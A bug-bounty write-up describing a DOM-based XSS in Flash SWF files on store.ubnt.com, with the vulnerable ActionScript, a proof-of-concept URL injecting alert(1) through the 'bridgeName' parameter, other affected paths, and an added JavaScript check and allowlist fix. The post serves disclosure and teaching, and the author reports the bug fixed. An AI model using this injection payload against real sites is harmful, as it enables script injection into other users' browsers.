SWF XSS (DOM-Based XSS)

Hey Folks,

I was working on UBNT for a bounty and I found several XSS issues there, so I’m sharing one of the cool ones.

function dispatchInit(param1:Event=null) : void {
    if(ExternalInterface.available == false){
        return;
    }
    if(bridgeName == null){
        // bridgeName is read straight from the FlashVars (URL-controllable)
        bridgeName = baseObject.root.loaderInfo.parameters["bridgeName"];
        if(bridgeName == null){
            bridgeName = "flash";
        }
    }
    // The unfiltered value is handed to ExternalInterface.call as an argument
    _registerComplete = ExternalInterface.call("FABridge__bridgeInitialized",[bridgeName]);
    dispatchEvent(new Event(FABridge.INITIALIZED));
}

In the above code the FlashVar parameter “bridgeName” is passed to the ExternalInterface.call method without filtering. It is possible to pass JavaScript code via the bridgeName parameter that will be executed when the vulnerable function is called (when the page loads).

Proof of Concept:

As proof of concept the following URL will inject the JavaScript code “alert(1)” to illustrate the flaw:

https://store.ubnt.com/skin/adminhtml/default/default/media/editor.swf?bridgeName=1\%22]%29%29;alert%281%29}catch%28e%29{alert%281%29}//
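Why the backslash in the proof-of-concept value above matters, and an allowlist check that rejects it, as an added example that is not code from the original post. It assumes a simplified model of how Flash Player serializes ExternalInterface.call arguments (double quotes escaped, backslashes not); `flashSerializeArg`, `literalEnd`, `breaksOutOfString` and `safeBridgeName` are hypothetical names.

```javascript
// Added example. Simplified model (an assumption, not shown on the page) of how
// Flash Player serializes a string argument of ExternalInterface.call into
// JavaScript source: double quotes are escaped, backslashes are not.
function flashSerializeArg(value) {
  return '"' + value.replace(/"/g, '\\"') + '"';
}

// Index at which a JavaScript tokenizer would end the string literal, or -1
// if the literal is never terminated.
function literalEnd(literal) {
  for (let i = 1; i < literal.length; i++) {
    if (literal[i] === '\\') { i++; continue; } // escape consumes next char
    if (literal[i] === '"') return i;
  }
  return -1;
}

// True when the value ends the literal early (or never closes it), so the
// rest of the value would be parsed as script instead of data.
function breaksOutOfString(value) {
  const literal = flashSerializeArg(value);
  return literalEnd(literal) !== literal.length - 1;
}

// Hypothetical hardening of the page's bridgeName handling: accept only an
// identifier-shaped name, otherwise fall back to the default "flash".
const BRIDGE_NAME_RE = /^[A-Za-z_][A-Za-z0-9_]{0,31}$/;
function safeBridgeName(raw) {
  return typeof raw === 'string' && BRIDGE_NAME_RE.test(raw) ? raw : 'flash';
}

// The bridgeName value from the proof-of-concept URL on this page, decoded.
const pocValue = decodeURIComponent(
  '1\\%22]%29%29;alert%281%29}catch%28e%29{alert%281%29}//');

for (const v of ['flash', 'my"bridge', pocValue]) {
  console.log(JSON.stringify(v), 'breaks out:', breaksOutOfString(v),
              '-> used:', safeBridgeName(v));
}
```

Validating the FlashVar against an allowlist where it is read avoids relying on the serializer's escaping at all.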


Some other paths:

https://store.ubnt.com/skin/adminhtml/default/default/media/editor.swf 
https://store.ubnt.com/skin/adminhtml/default/default/media/uploader.swf 
https://store.ubnt.com/skin/adminhtml/default/default/media/uploaderSingle.swf

The bug is fixed now.

Best Regards
Shubham

 

shubhamgupta

 
